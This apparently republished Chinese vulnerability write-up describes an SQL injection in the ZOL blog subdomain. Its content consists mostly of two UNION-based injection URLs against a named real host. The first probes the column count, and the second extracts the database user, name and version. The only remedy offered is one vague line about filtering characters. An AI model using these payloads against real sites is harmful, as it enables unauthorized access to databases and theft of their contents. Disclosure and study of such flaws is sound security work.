中关村在线博客子站SQL注入及修复方案
中关村在线博客子站SQL注入及修复方案
发布时间:2016-12-21 来源:查字典编辑
摘要:http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0unionselect1,...

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--

中关村在线博客子站SQL注入及修复方案1

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5--

中关村在线博客子站SQL注入及修复方案2

中关村在线博客子站SQL注入及修复方案3

中关村在线博客子站SQL注入及修复方案4

修复方案:

过滤参数提交非法字符或者拦截敏感字符等等。。。

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新漏洞分析学习
热门漏洞分析学习
网络安全子分类